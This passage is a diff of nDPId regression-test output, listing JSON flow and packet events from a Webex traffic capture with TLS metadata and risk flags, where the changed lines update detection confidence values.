00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} @@ -36,20 +36,20 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 